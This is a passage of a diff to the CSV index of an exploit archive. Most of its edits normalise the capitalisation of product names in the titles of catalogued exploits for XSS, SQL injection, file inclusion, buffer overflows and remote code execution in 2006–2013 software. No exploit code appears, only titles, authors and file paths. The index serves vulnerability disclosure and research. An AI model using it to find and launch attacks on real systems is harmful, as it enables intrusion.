Traversal",2006-11-20,the_Edit0r,php,webapps,0 29146,platforms/windows/remote/29146.c,"Novell Client 4.91 - NWSPOOL.dll Remote Buffer Overflow",2006-11-21,"Andres Tarasco Acuna",windows,remote,0 34371,platforms/windows/local/34371.py,"BlazeDVD Pro 7.0 - '.plf' Buffer Overflow (SEH)",2014-08-20,metacom,windows,local,0 -29161,platforms/osx/dos/29161.txt,"Apple Mac OSX 10.4.8 - UDTO Disk Image Remote Denial of Service",2006-11-21,LMH,osx,dos,0 +29161,platforms/osx/dos/29161.txt,"Apple Mac OS X 10.4.8 - UDTO Disk Image Remote Denial of Service",2006-11-21,LMH,osx,dos,0 29162,platforms/php/webapps/29162.txt,"My Little Weblog 2006.11.21 - Weblog.php Cross-Site Scripting",2006-11-21,the_Edit0r,php,webapps,0 29217,platforms/php/webapps/29217.txt,"CuteNews 1.3.6 - Result Parameter Cross-Site Scripting",2006-12-02,Detefix,php,webapps,0 29218,platforms/php/webapps/29218.txt,"PHPNews 1.3 - Link_Temp.php Multiple Cross-Site Scripting Vulnerabilities",2006-12-02,Detefix,php,webapps,0 @@ -26202,7 +26203,7 @@ id,file,description,date,author,platform,type,port 29170,platforms/windows/dos/29170.c,"Nvidia NView 3.5 - Keystone.exe Local Denial of Service",2006-11-23,Hessam-x,windows,dos,0 29171,platforms/windows/remote/29171.txt,"Business Objects Crystal Reports XI Professional - File Handling Buffer Overflow",2006-11-23,LSsec.com,windows,remote,0 29172,platforms/windows/dos/29172.txt,"Microsoft Office 97 - HTMLMARQ.OCX Library Denial of Service",2006-11-22,"Michal Bucko",windows,dos,0 -29173,platforms/php/webapps/29173.txt,"Active PHP Bookmarks 1.1.2 - APB_SETTINGS['apb_path' ] Multiple Remote File Inclusion",2006-11-23,ThE-LoRd-Of-CrAcKiNg,php,webapps,0 +29173,platforms/php/webapps/29173.txt,"Active PHP BookMarks 1.1.2 - APB_SETTINGS['apb_path' ] Multiple Remote File Inclusion",2006-11-23,ThE-LoRd-Of-CrAcKiNg,php,webapps,0 29174,platforms/asp/webapps/29174.txt,"MidiCart ASP - Item_Show.asp ID2006quant Parameter SQL Injection",2006-11-24,"Aria-Security Team",asp,webapps,0 29175,platforms/php/webapps/29175.txt,"Simple PHP Gallery 1.1 - System SP_Index.php Cross-Site Scripting",2006-11-24,"Al7ejaz Hacker",php,webapps,0 29176,platforms/asp/webapps/29176.txt,"ASP ListPics 5.0 - Listpics.asp SQL Injection",2006-11-24,"Aria-Security Team",asp,webapps,0 @@ -26219,18 +26220,18 @@ id,file,description,date,author,platform,type,port 29187,platforms/php/webapps/29187.txt,"cPanel WebHost Manager 3.1 - dofeaturemanager feature Parameter Cross-Site Scripting",2006-11-25,"Aria-Security Team",php,webapps,0 29188,platforms/php/webapps/29188.txt,"cPanel WebHost Manager 3.1 - park ndomain Parameter Cross-Site Scripting",2006-11-25,"Aria-Security Team",php,webapps,0 29189,platforms/asp/webapps/29189.txt,"fipsShop - Multiple SQL Injections",2006-11-25,"Aria-Security Team",asp,webapps,0 -29190,platforms/osx/local/29190.txt,"Apple Mac OSX 10.4.x - Mach-O Binary Loading Integer Overflow",2006-11-26,LMH,osx,local,0 +29190,platforms/osx/local/29190.txt,"Apple Mac OS X 10.4.x - Mach-O Binary Loading Integer Overflow",2006-11-26,LMH,osx,local,0 29191,platforms/asp/webapps/29191.txt,"ClickContact - default.asp Multiple SQL Injection",2006-11-27,"Aria-Security Team",asp,webapps,0 29192,platforms/asp/webapps/29192.txt,"Clickblog - Displaycalendar.asp SQL Injection",2006-11-27,"Aria-Security Team",asp,webapps,0 29193,platforms/asp/webapps/29193.txt,"Click Gallery - Multiple Input Validation Vulnerabilities",2006-11-27,"Aria-Security Team",asp,webapps,0 -29194,platforms/osx/local/29194.c,"Apple Mac OSX 10.4.x - AppleTalk AIOCRegLocalZN IOCTL Stack Buffer Overflow",2006-11-27,LMH,osx,local,0 -29195,platforms/asp/webapps/29195.txt,"uPhotoGallery 1.1 - slideshow.asp ci Parameter SQL Injection",2006-11-27,"Aria-Security Team",asp,webapps,0 +29194,platforms/osx/local/29194.c,"Apple Mac OS X 10.4.x - AppleTalk AIOCRegLocalZN IOCTL Stack Buffer Overflow",2006-11-27,LMH,osx,local,0 +29195,platforms/asp/webapps/29195.txt,"uPhotoGallery 1.1 - Slideshow.asp ci Parameter SQL Injection",2006-11-27,"Aria-Security Team",asp,webapps,0 29196,platforms/asp/webapps/29196.txt,"uPhotoGallery 1.1 - thumbnails.asp ci Parameter SQL Injection",2006-11-27,"Aria-Security Team",asp,webapps,0 29197,platforms/asp/webapps/29197.txt,"Evolve Shopping Cart - products.asp SQL Injection",2006-11-27,"Aria-Security Team",asp,webapps,0 29198,platforms/php/webapps/29198.txt,"b2evolution 1.8.2/1.9 - _404_not_found.page.php Multiple Parameter Cross-Site Scripting",2006-11-16,"lotto fischer",php,webapps,0 29199,platforms/php/webapps/29199.txt,"b2evolution 1.8.2/1.9 - _410_stats_gone.page.php app_name Parameter Cross-Site Scripting",2006-11-16,"lotto fischer",php,webapps,0 29200,platforms/php/webapps/29200.txt,"b2evolution 1.8.2/1.9 - _referer_spam.page.php Multiple Parameter Cross-Site Scripting",2006-11-16,"lotto fischer",php,webapps,0 -29201,platforms/osx/local/29201.c,"Apple Mac OSX 10.4.x - Shared_Region_Make_Private_Np Kernel Function Local Memory Corruption",2006-11-29,LMH,osx,local,0 +29201,platforms/osx/local/29201.c,"Apple Mac OS X 10.4.x - Shared_Region_Make_Private_Np Kernel Function Local Memory Corruption",2006-11-29,LMH,osx,local,0 29202,platforms/php/webapps/29202.txt,"Seditio1.10 / Land Down 8.0 Under - polls.php SQL Injection",2006-11-30,ajann,php,webapps,0 29203,platforms/php/webapps/29203.php,"Woltlab Burning Board 2.3.x - register.php Cross-Site Scripting",2006-11-30,blueshisha,php,webapps,0 29204,platforms/netbsd_x86/dos/29204.pl,"NetBSD 3.1 FTPd / Tnftpd - Port Remote Buffer Overflow",2006-12-01,kcope,netbsd_x86,dos,0 @@ -26244,17 +26245,17 @@ id,file,description,date,author,platform,type,port 29210,platforms/php/remote/29210.rb,"Open Flash Chart 2 - Arbitrary File Upload",2013-10-26,Metasploit,php,remote,80 29230,platforms/windows/remote/29230.html,"Citrix Presentation Server Client 9.200 - WFICA.OCX ActiveX Component Heap Buffer Overflow",2006-12-06,"Andrew Christensen",windows,remote,0 29223,platforms/php/webapps/29223.txt,"Inside Systems Mail 2.0 - error.php Cross-Site Scripting",2006-12-04,"Vicente Aguilera Diaz",php,webapps,0 -29224,platforms/asp/webapps/29224.txt,"UApplication UGuestbook 1.0 - index.asp SQL Injection",2006-12-04,"Aria-Security Team",asp,webapps,0 +29224,platforms/asp/webapps/29224.txt,"UApplication Uguestbook 1.0 - index.asp SQL Injection",2006-12-04,"Aria-Security Team",asp,webapps,0 29225,platforms/php/webapps/29225.txt,"ac4p Mobile - up.php Taaa Parameter Cross-Site Scripting",2006-12-04,SwEET-DeViL,php,webapps,0 29226,platforms/php/webapps/29226.txt,"ac4p Mobile - polls.php Multiple Parameter Cross-Site Scripting (2)",2006-12-04,SwEET-DeViL,php,webapps,0 29227,platforms/asp/webapps/29227.txt,"Vt-Forum Lite 1.3 - vf_info.asp StrMes Parameter Cross-Site Scripting",2006-12-04,St@rExT,asp,webapps,0 29228,platforms/asp/webapps/29228.txt,"Vt-Forum Lite 1.3 - vf_newtopic.asp IFRAME Element Cross-Site Scripting",2006-12-04,St@rExT,asp,webapps,0 -29229,platforms/windows/dos/29229.txt,"Microsoft Internet Explorer 6.0 - Frame Src Denial of Service",2006-12-05,"Juan Pablo Lopez",windows,dos,0 +29229,platforms/windows/dos/29229.txt,"Microsoft Internet Explorer 6 - Frame Src Denial of Service",2006-12-05,"Juan Pablo Lopez",windows,dos,0 29328,platforms/php/webapps/29328.txt,"ImpressPages CMS 3.6 - Arbitrary File Deletion",2013-11-01,LiquidWorm,php,webapps,0 -29236,platforms/windows/dos/29236.html,"Microsoft Internet Explorer 7.0 - CSS Width Element Denial of Service",2006-12-06,xiam.core,windows,dos,0 +29236,platforms/windows/dos/29236.html,"Microsoft Internet Explorer 7 - CSS Width Element Denial of Service",2006-12-06,xiam.core,windows,dos,0 29237,platforms/php/webapps/29237.txt,"CPanel 11 BoxTrapper - Manage.HTML Cross-Site Scripting",2006-12-08,"Aria-Security Team",php,webapps,0 29238,platforms/php/webapps/29238.txt,"cPanel Web Hosting Manager 3.1 - Multiple Cross-Site Scripting Vulnerabilities",2006-12-08,"Aria-Security Team",php,webapps,0 -29239,platforms/php/local/29239.txt,"PHP 5.2 - Session.Save_Path() Safe_Mode and Open_Basedir Restriction Bypass",2006-12-08,"Maksymilian Arciemowicz",php,local,0 +29239,platforms/php/local/29239.txt,"PHP 5.2 - Session.Save_Path() Safe_mode and open_basedir Restriction Bypass",2006-12-08,"Maksymilian Arciemowicz",php,local,0 29240,platforms/asp/webapps/29240.txt,"Cilem Haber Free Edition - hata.asp hata Parameter Cross-Site Scripting",2006-12-08,ShaFuck31,asp,webapps,0 29241,platforms/asp/webapps/29241.txt,"MaviPortal - Arama.asp Cross-Site Scripting",2006-12-09,St@rExT,asp,webapps,0 29242,platforms/php/webapps/29242.txt,"Messageriescripthp 2.0 - lire-avis.php aa Parameter SQL Injection",2006-12-09,Mr_KaLiMaN,php,webapps,0 @@ -26273,11 +26274,11 @@ id,file,description,date,author,platform,type,port 29255,platforms/php/webapps/29255.txt,"KDPics 1.11/1.16 - galeries.inc.php3 categories Parameter Cross-Site Scripting",2006-12-09,Mr_KaLiMaN,php,webapps,0 29327,platforms/windows/local/29327.py,"Watermark Master 2.2.23 - Buffer Overflow (SEH)",2013-11-01,metacom,windows,local,0 29258,platforms/php/webapps/29258.txt,"PHP RSS Reader 2010 - SQL Injection",2013-10-28,"mishal abdullah",php,webapps,0 -29273,platforms/hardware/remote/29273.pl,"WatchGuard Firewall XTM 11.7.4u1 - Remote Buffer Overflow",2013-10-29,st3n,hardware,remote,8080 +29273,platforms/hardware/remote/29273.pl,"Watchguard Firewall XTM 11.7.4u1 - Remote Buffer Overflow",2013-10-29,st3n,hardware,remote,8080 29263,platforms/windows/local/29263.pl,"BlazeDVD 6.2 - '.plf' Buffer Overflow (SEH)",2013-10-28,"Mike Czumak",windows,local,0 29264,platforms/php/webapps/29264.txt,"Onpub CMS 1.4 / 1.5 - Multiple SQL Injections",2013-10-28,Vulnerability-Lab,php,webapps,0 29265,platforms/php/webapps/29265.txt,"ILIAS eLearning CMS 4.3.4 & 4.4 - Persistent Cross-Site Scripting",2013-10-29,Vulnerability-Lab,php,webapps,0 -29266,platforms/hardware/webapps/29266.txt,"Stem Innovation - 'IZON' Hard-coded Credentials",2013-10-29,"Mark Stanislav",hardware,webapps,0 +29266,platforms/hardware/webapps/29266.txt,"Stem Innovation - 'IZON' Hard-Coded Credentials",2013-10-29,"Mark Stanislav",hardware,webapps,0 29267,platforms/php/webapps/29267.txt,"ProNews 1.5 - admin/change.php Multiple Parameter Cross-Site Scripting",2006-12-09,Mr_KaLiMaN,php,webapps,0 29268,platforms/php/webapps/29268.txt,"ProNews 1.5 - lire-avis.php aa Parameter SQL Injection",2006-12-09,Mr_KaLiMaN,php,webapps,0 29269,platforms/php/webapps/29269.txt,"ProNews 1.5 - lire-avis.php aa Parameter Cross-Site Scripting",2006-12-09,Mr_KaLiMaN,php,webapps,0 @@ -26294,13 +26295,13 @@ id,file,description,date,author,platform,type,port 29287,platforms/windows/dos/29287.txt,"Multiple Vendor Firewall - HIPS Process Spoofing",2006-12-15,"Matousec Transparent security",windows,dos,0 29288,platforms/asp/webapps/29288.txt,"Omniture SiteCatalyst - Multiple Cross-Site Scripting Vulnerabilities",2006-12-16,"Hackers Center Security",asp,webapps,0 29289,platforms/php/webapps/29289.php,"eXtreme-fusion 4.02 - Fusion_Forum_View.php Local File Inclusion",2006-12-16,Kacper,php,webapps,0 -29290,platforms/php/remote/29290.c,"Apache + PHP < 5.3.12 / < 5.4.2 - cgi-bin Remote Code Execution Exploit",2013-10-29,kingcope,php,remote,80 +29290,platforms/php/remote/29290.c,"Apache + PHP < 5.3.12 / < 5.4.2 - cgi-bin Remote Code Execution",2013-10-29,kingcope,php,remote,80 29293,platforms/asp/webapps/29293.txt,"Contra Haber Sistemi 1.0 - Haber.asp SQL Injection",2006-12-16,ShaFuck31,asp,webapps,0 29294,platforms/php/webapps/29294.html,"Knusperleicht Shoutbox 2.6 - Shout.php HTML Injection",2006-12-18,IMHOT3B,php,webapps,0 29295,platforms/windows/dos/29295.html,"Microsoft Outlook - ActiveX Control Remote Internet Explorer Denial of Service",2006-12-18,shinnai,windows,dos,0 29296,platforms/linux/dos/29296.txt,"KDE LibkHTML 4.2 - NodeType Function Denial of Service",2006-12-19,"Federico L. Bossi Bonin",linux,dos,0 29297,platforms/hardware/dos/29297.py,"HP Printer FTP Print Server 2.4.5 - List Command Buffer Overflow",2006-12-19,"Joxean Koret",hardware,dos,0 -29298,platforms/php/webapps/29298.txt,"OSTicket 1.2/1.3 Support Cards - view.php Cross-Site Scripting",2006-12-19,"Hacker CooL",php,webapps,0 +29298,platforms/php/webapps/29298.txt,"osTicket 1.2/1.3 Support Cards - view.php Cross-Site Scripting",2006-12-19,"Hacker CooL",php,webapps,0 29299,platforms/php/webapps/29299.txt,"Mini Web Shop 2.1.c - view.php Viewcategory.php Cross-Site Scripting",2006-12-19,Linux_Drox,php,webapps,0 29300,platforms/php/webapps/29300.txt,"Typo3 3.7/3.8/4.0 - Class.TX_RTEHTMLArea_PI1.php Multiple Remote Command Execution Vulnerabilities",2006-12-20,"D. Fabian",php,webapps,0 29301,platforms/jsp/webapps/29301.txt,"Oracle Portal 9.0.2 - Calendar.jsp Multiple HTTP Response Splitting Vulnerabilities",2006-12-20,"putosoft softputo",jsp,webapps,0 @@ -26310,7 +26311,7 @@ id,file,description,date,author,platform,type,port 29292,platforms/windows/webapps/29292.txt,"XAMPP for Windows 1.8.2 - Blind SQL Injection",2013-10-29,"Sebastián Magof",windows,webapps,0 29305,platforms/multiple/dos/29305.txt,"FTPRush 1.0.610 - Host Field Local Buffer Overflow",2006-12-22,"Umesh Wanve",multiple,dos,0 29306,platforms/php/webapps/29306.txt,"A-Blog 1.0 - Unspecified Cross-Site Scripting",2006-12-22,Fukumori,php,webapps,0 -29307,platforms/windows/dos/29307.c,"Softmaker Office 2012 - TextMaker Memory Corruption",2013-10-30,"Arash Allebrahim",windows,dos,0 +29307,platforms/windows/dos/29307.c,"SoftMaker Office 2012 - TextMaker Memory Corruption",2013-10-30,"Arash Allebrahim",windows,dos,0 29308,platforms/php/webapps/29308.txt,"Oracle Portal 9i/10g - Container_Tabs.jsp Cross-Site Scripting",2006-12-22,"putosoft softputo",php,webapps,0 29309,platforms/windows/local/29309.pl,"AudioCoder 0.8.22 - '.m3u' SEH Buffer Overflow",2013-10-30,"Mike Czumak",windows,local,0 29310,platforms/multiple/dos/29310.txt,"WikiReader 1.12 - URL Field Local Buffer Overflow",2006-12-22,"Umesh Wanve",multiple,dos,0 @@ -26334,9 +26335,9 @@ id,file,description,date,author,platform,type,port 30203,platforms/asp/webapps/30203.txt,"Comersus Cart 7.0.7 - comersus_optReviewReadExec.asp id Parameter SQL Injection",2007-06-20,Doz,asp,webapps,0 30204,platforms/asp/webapps/30204.txt,"Comersus Cart 7.0.7 - comersus_customerAuthenticateForm.asp redirectUrl Cross-Site Scripting",2007-06-20,Doz,asp,webapps,0 30186,platforms/linux/remote/30186.txt,"Firebird SQL Fbserver 2.0 - Remote Buffer Overflow",2007-06-12,"Cody Pierce",linux,remote,0 -29330,platforms/php/webapps/29330.txt,"Wordpress Switchblade Themes Arbitrary 1.3 - Arbitrary File Upload",2013-11-01,"Byakuya Kouta",php,webapps,0 -29331,platforms/php/webapps/29331.txt,"ImpressPages CMS 3.6 - manage() Function Remote Code Execution Exploit",2013-11-01,LiquidWorm,php,webapps,0 -29332,platforms/php/webapps/29332.txt,"Wordpress Think Responsive Themes 1.0 - Arbitrary File Upload",2013-11-01,"Byakuya Kouta",php,webapps,0 +29330,platforms/php/webapps/29330.txt,"WordPress Switchblade Themes Arbitrary 1.3 - Arbitrary File Upload",2013-11-01,"Byakuya Kouta",php,webapps,0 +29331,platforms/php/webapps/29331.txt,"ImpressPages CMS 3.6 - manage() Function Remote Code Execution",2013-11-01,LiquidWorm,php,webapps,0 +29332,platforms/php/webapps/29332.txt,"WordPress Think Responsive Themes 1.0 - Arbitrary File Upload",2013-11-01,"Byakuya Kouta",php,webapps,0 29333,platforms/asp/webapps/29333.txt,"Efkan Forum 1.0 - Grup Variable SQL Injection",2006-12-22,ShaFuq31,asp,webapps,0 29334,platforms/cfm/webapps/29334.txt,"Future Internet - index.cfm Multiple Parameter SQL Injection",2006-12-23,Linux_Drox,cfm,webapps,0 29335,platforms/cfm/webapps/29335.txt,"Future Internet - index.cfm categoryId Parameter Cross-Site Scripting",2006-12-23,Linux_Drox,cfm,webapps,0 @@ -26362,7 +26363,7 @@ id,file,description,date,author,platform,type,port 29354,platforms/php/webapps/29354.txt,"pdirl PHP Directory Listing 1.0.4 - Cross-Site Scripting Web Vulnerabilities",2013-11-01,Vulnerability-Lab,php,webapps,0 29473,platforms/linux/dos/29473.txt,"Squid Proxy 2.5/2.6 - FTP URI Remote Denial of Service",2007-01-16,"David Duncan Ross Palmer",linux,dos,0 29474,platforms/php/webapps/29474.txt,"Scriptme SmE 1.21 - File Mailer Login SQL Injection",2007-01-16,CorryL,php,webapps,0 -29356,platforms/php/webapps/29356.txt,"Wordpress 1.x/2.0.x - template.php HTML Injection",2006-12-27,"David Kierznowski",php,webapps,0 +29356,platforms/php/webapps/29356.txt,"WordPress 1.x/2.0.x - template.php HTML Injection",2006-12-27,"David Kierznowski",php,webapps,0 29357,platforms/asp/webapps/29357.txt,"Hosting Controller 7C - FolderManager.aspx Directory Traversal",2006-12-27,KAPDA,asp,webapps,0 29358,platforms/asp/webapps/29358.txt,"DMXReady Secure Login Manager 1.0 - 'login.asp' sent Parameter SQL Injection",2006-12-27,Doz,asp,webapps,0 29359,platforms/asp/webapps/29359.txt,"DMXReady Secure Login Manager 1.0 - content.asp sent Parameter SQL Injection",2006-12-27,Doz,asp,webapps,0 @@ -26383,7 +26384,7 @@ id,file,description,date,author,platform,type,port 29374,platforms/windows/local/29374.txt,"Kerio Personal Firewall 4.3 - IPHLPAPI.dll Privilege Escalation",2007-01-01,"Matousec Transparent security",windows,local,0 29377,platforms/php/webapps/29377.txt,"AShop Deluxe 4.5 - ashop/catalogue.php Multiple Parameter Cross-Site Scripting",2007-01-02,"Hackers Center Security",php,webapps,0 29378,platforms/php/webapps/29378.txt,"AShop Deluxe 4.5 - ashop/basket.php cat Parameter Cross-Site Scripting",2007-01-02,"Hackers Center Security",php,webapps,0 -29379,platforms/php/webapps/29379.txt,"AShop Deluxe 4.5 - ashop/search.php searchstring Parameter Cross-Site Scripting",2007-01-02,"Hackers Center Security",php,webapps,0 +29379,platforms/php/webapps/29379.txt,"AShop Deluxe 4.5 - ashop/search.php SearchString Parameter Cross-Site Scripting",2007-01-02,"Hackers Center Security",php,webapps,0 29380,platforms/php/webapps/29380.txt,"AShop Deluxe 4.5 - shipping.php Multiple Parameter Cross-Site Scripting",2007-01-02,"Hackers Center Security",php,webapps,0 29381,platforms/php/webapps/29381.txt,"AShop Deluxe 4.5 - admin/editcatalogue.php cat Parameter Cross-Site Scripting",2007-01-02,"Hackers Center Security",php,webapps,0 29382,platforms/php/webapps/29382.txt,"AShop Deluxe 4.5 - admin/salesadmin.php resultpage Parameter Cross-Site Scripting",2007-01-02,"Hackers Center Security",php,webapps,0 @@ -26402,7 +26403,7 @@ id,file,description,date,author,platform,type,port 29395,platforms/cgi/webapps/29395.txt,"EditTag 1.2 - mkpw.pl plain Parameter Cross-Site Scripting",2007-01-05,NetJackal,cgi,webapps,0 29396,platforms/cgi/webapps/29396.txt,"EditTag 1.2 - mkpw.cgi plain Parameter Cross-Site Scripting",2007-01-05,NetJackal,cgi,webapps,0 29397,platforms/php/webapps/29397.php,"Coppermine Photo Gallery 1.x - Albmgr.php SQL Injection",2007-01-05,DarkFig,php,webapps,0 -29398,platforms/asp/webapps/29398.txt,"Shopstorenow E-commerce Shopping Cart - Orange.asp SQL Injection",2007-01-06,IbnuSina,asp,webapps,0 +29398,platforms/asp/webapps/29398.txt,"Shopstorenow E-Commerce Shopping Cart - Orange.asp SQL Injection",2007-01-06,IbnuSina,asp,webapps,0 29399,platforms/linux/dos/29399.txt,"Multiple PDF Readers - Multiple Remote Buffer Overflow",2007-01-06,LMH,linux,dos,0 29400,platforms/novell/remote/29400.txt,"Novell Access Manager 3 - Identity Server IssueInstant Parameter Cross-Site Scripting",2007-01-08,anonymous,novell,remote,0 29401,platforms/asp/webapps/29401.txt,"CreateAuction - Cats.asp SQL Injection",2007-01-08,IbnuSina,asp,webapps,0 @@ -26444,7 +26445,7 @@ id,file,description,date,author,platform,type,port 29437,platforms/php/webapps/29437.txt,"Easy Banner Pro 2.8 - info.php Remote File Inclusion",2007-01-07,rUnViRuS,php,webapps,0 29438,platforms/php/webapps/29438.txt,"Edit-X - Edit_Address.php Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 29439,platforms/multiple/remote/29439.txt,"iPlanet Web Server 4.1 - Search Module Cross-Site Scripting",2007-01-09,Khalsa,multiple,remote,0 -29441,platforms/osx/dos/29441.txt,"Apple Mac OSX 10.4.8 - DMG UFS FFS_MountFS Integer Overflow",2007-01-10,LMH,osx,dos,0 +29441,platforms/osx/dos/29441.txt,"Apple Mac OS X 10.4.8 - DMG UFS FFS_MountFS Integer Overflow",2007-01-10,LMH,osx,dos,0 29442,platforms/php/webapps/29442.html,"phpBB 2.0.21 - privmsg.php HTML Injection",2007-01-11,Demential,php,webapps,0 29443,platforms/windows/dos/29443.py,"VideoLAN VLC Media Player 0.8.6a - Unspecified Denial of Service",2007-01-11,shinnai,windows,dos,0 29444,platforms/windows/dos/29444.pl,"CA BrightStor ARCserve Backup - Message Engine/Tape Engine Remote Buffer Overflow",2007-01-11,"Tenable NS",windows,dos,0 @@ -26452,24 +26453,24 @@ id,file,description,date,author,platform,type,port 36794,platforms/multiple/webapps/36794.txt,"SevenIT SevDesk 3.10 - Multiple Web Vulnerabilities",2015-04-21,Vulnerability-Lab,multiple,webapps,0 29446,platforms/linux/local/29446.c,"Grsecurity Kernel PaX - Privilege Escalation",2006-12-18,anonymous,linux,local,0 29447,platforms/windows/dos/29447.txt,"WinZip 9.0 - Command Line Remote Buffer Overflow",2007-01-12,"Umesh Wanve",windows,dos,0 -29448,platforms/osx/remote/29448.txt,"Apple Mac OSX 10.4.8 - DMG UFS Byte_Swap_Sbin() Integer Overflow",2007-01-12,LMH,osx,remote,0 +29448,platforms/osx/remote/29448.txt,"Apple Mac OS X 10.4.8 - DMG UFS Byte_Swap_Sbin() Integer Overflow",2007-01-12,LMH,osx,remote,0 29449,platforms/multiple/remote/29449.html,"Oracle ORADC - ActiveX Control Remote Code Execution",2007-01-12,"Umesh Wanve",multiple,remote,0 29450,platforms/php/webapps/29450.txt,"Ezboxx 0.7.6 Beta - Multiple Input Validation Vulnerabilities",2007-01-12,"Doron P",php,webapps,0 29451,platforms/php/webapps/29451.txt,"All In One Control Panel 1.3.x - cp_downloads.php did Parameter SQL Injection",2007-01-12,Coloss,php,webapps,0 -29452,platforms/osx/dos/29452.txt,"Apple Mac OSX 10.4.8 - DMG UFS UFS_LookUp Denial of Service",2007-01-13,LMH,osx,dos,0 +29452,platforms/osx/dos/29452.txt,"Apple Mac OS X 10.4.8 - DMG UFS UFS_LookUp Denial of Service",2007-01-13,LMH,osx,dos,0 29453,platforms/php/webapps/29453.php,"PHP-Nuke 7.x - Block-Old_Articles.php SQL Injection",2007-01-13,Paisterist,php,webapps,0 -29454,platforms/osx/dos/29454.txt,"Apple Mac OSX 10.4.8 - DMG HFS+ DO_HFS_TRUNCATE Denial of Service",2007-01-13,LMH,osx,dos,0 -29455,platforms/windows/dos/29455.py,"RealNetwork RealPlayer 10.5 - .MID File Handling Remote Denial of Service",2007-01-15,shinnai,windows,dos,0 -29456,platforms/asp/webapps/29456.txt,"InstantASP 4.1 - Logon.aspx SessionID Parameter Cross-Site Scripting",2007-01-15,Doz,asp,webapps,0 +29454,platforms/osx/dos/29454.txt,"Apple Mac OS X 10.4.8 - DMG HFS+ DO_HFS_TRUNCATE Denial of Service",2007-01-13,LMH,osx,dos,0 +29455,platforms/windows/dos/29455.py,"RealNetwork RealPlayer 10.5 - '.MID' File Handling Remote Denial of Service",2007-01-15,shinnai,windows,dos,0 +29456,platforms/asp/webapps/29456.txt,"InstantASP 4.1 - Logon.aspx sessionid Parameter Cross-Site Scripting",2007-01-15,Doz,asp,webapps,0 29457,platforms/asp/webapps/29457.txt,"InstantASP 4.1 - Members1.aspx Multiple Parameter Cross-Site Scripting",2007-01-15,Doz,asp,webapps,0 29458,platforms/linux/dos/29458.txt,"Libgtop2 Library - Local Buffer Overflow",2007-01-15,"Liu Qishuai",linux,dos,0 29513,platforms/linux/remote/29513.rb,"VICIdial Manager - Send OS Command Injection",2013-11-08,Metasploit,linux,remote,80 29477,platforms/php/webapps/29477.txt,"Indexu 5.0/5.3 - upgrade.php gateway Parameter Cross-Site Scripting",2007-01-16,SwEET-DeViL,php,webapps,0 -29478,platforms/php/webapps/29478.txt,"Indexu 5.0/5.3 - suggest_category.php error_msg Parameter Cross-Site Scripting",2007-01-16,SwEET-DeViL,php,webapps,0 +29478,platforms/php/webapps/29478.txt,"Indexu 5.0/5.3 - suggest_category.php Error_msg Parameter Cross-Site Scripting",2007-01-16,SwEET-DeViL,php,webapps,0 29479,platforms/php/webapps/29479.txt,"Indexu 5.0/5.3 - user_detail.php u Parameter Cross-Site Scripting",2007-01-16,SwEET-DeViL,php,webapps,0 29480,platforms/php/webapps/29480.txt,"Indexu 5.0/5.3 - tell_friend.php Multiple Parameter Cross-Site Scripting",2007-01-16,SwEET-DeViL,php,webapps,0 29461,platforms/osx/dos/29461.txt,"Apple WebKit build 18794 - WebCore Remote Denial of Service",2007-01-15,"Tom Ferris",osx,dos,0 -29481,platforms/php/webapps/29481.txt,"Indexu 5.0/5.3 - sendmail.php Multiple Parameter Cross-Site Scripting",2007-01-16,SwEET-DeViL,php,webapps,0 +29481,platforms/php/webapps/29481.txt,"Indexu 5.0/5.3 - Sendmail.php Multiple Parameter Cross-Site Scripting",2007-01-16,SwEET-DeViL,php,webapps,0 29463,platforms/windows/dos/29463.c,"Ipswitch WS_FTP 2007 Professional - WSFTPURL.exe Local Memory Corruption",2007-01-15,LMH,windows,dos,0 29464,platforms/php/webapps/29464.txt,"Liens_Dynamiques 2.1 - AdminLien.php Security Restriction Bypass",2007-01-15,sn0oPy,php,webapps,0 29465,platforms/windows/local/29465.txt,"Outpost Firewall PRO 4.0 - Privilege Escalation",2007-01-15,"Matousec Transparent security",windows,local,0 @@ -26480,17 +26481,17 @@ id,file,description,date,author,platform,type,port 29470,platforms/linux/dos/29470.txt,"Oftpd 0.3.7 - Unsupported Address Family Remote Denial of Service",2007-01-15,anonymous,linux,dos,0 29471,platforms/linux/remote/29471.txt,"BlueZ 1.x/2.x - HIDD Bluetooh HID Command Injection",2007-11-16,"Collin Mulliner",linux,remote,0 29472,platforms/php/webapps/29472.txt,"DT_Guestbook 1.0 - 'index.php' Cross-Site Scripting",2007-01-16,"Jesper Jurcenoks",php,webapps,0 -29482,platforms/php/webapps/29482.php,"Wordpress Theme Kernel - Remote File Upload",2013-11-07,link_satisi,php,webapps,0 +29482,platforms/php/webapps/29482.php,"WordPress Theme Kernel - Remote File Upload",2013-11-07,link_satisi,php,webapps,0 29483,platforms/php/webapps/29483.txt,"Indexu 5.0/5.3 - send_pwd.php Multiple Parameter Cross-Site Scripting",2007-01-16,SwEET-DeViL,php,webapps,0 29484,platforms/php/webapps/29484.txt,"Indexu 5.0/5.3 - search.php keyword Parameter Cross-Site Scripting",2007-01-16,SwEET-DeViL,php,webapps,0 29485,platforms/php/webapps/29485.txt,"Indexu 5.0/5.3 - register.php Multiple Parameter Cross-Site Scripting",2007-01-16,SwEET-DeViL,php,webapps,0 29486,platforms/php/webapps/29486.txt,"Indexu 5.0/5.3 - power_search.php Multiple Parameter Cross-Site Scripting",2007-01-16,SwEET-DeViL,php,webapps,0 29487,platforms/php/webapps/29487.txt,"Indexu 5.0/5.3 - new.php Multiple Parameter Cross-Site Scripting",2007-01-16,SwEET-DeViL,php,webapps,0 29488,platforms/php/webapps/29488.txt,"Indexu 5.0/5.3 - mailing_list.php Multiple Variables Cross-Site Scripting",2007-01-16,SwEET-DeViL,php,webapps,0 -29489,platforms/php/webapps/29489.txt,"Indexu 5.0/5.3 - 'login.php' error_msg Parameter Cross-Site Scripting",2007-01-16,SwEET-DeViL,php,webapps,0 -29490,platforms/windows/remote/29490.txt,"avm fritz!dsl igd control service 2.2.29 - Directory Traversal information disclosure",2007-01-17,DPR,windows,remote,0 -29491,platforms/php/webapps/29491.txt,"myBloggie 2.1.5 - 'index.php' PATH_INFO Parameter Cross-Site Scripting",2007-01-17,CorryL,php,webapps,0 -29492,platforms/php/webapps/29492.txt,"myBloggie 2.1.5 - 'login.php' PATH_INFO Parameter Cross-Site Scripting",2007-01-17,CorryL,php,webapps,0 +29489,platforms/php/webapps/29489.txt,"Indexu 5.0/5.3 - 'login.php' Error_msg Parameter Cross-Site Scripting",2007-01-16,SwEET-DeViL,php,webapps,0 +29490,platforms/windows/remote/29490.txt,"avm fritz!dsl igd control service 2.2.29 - Directory Traversal Information 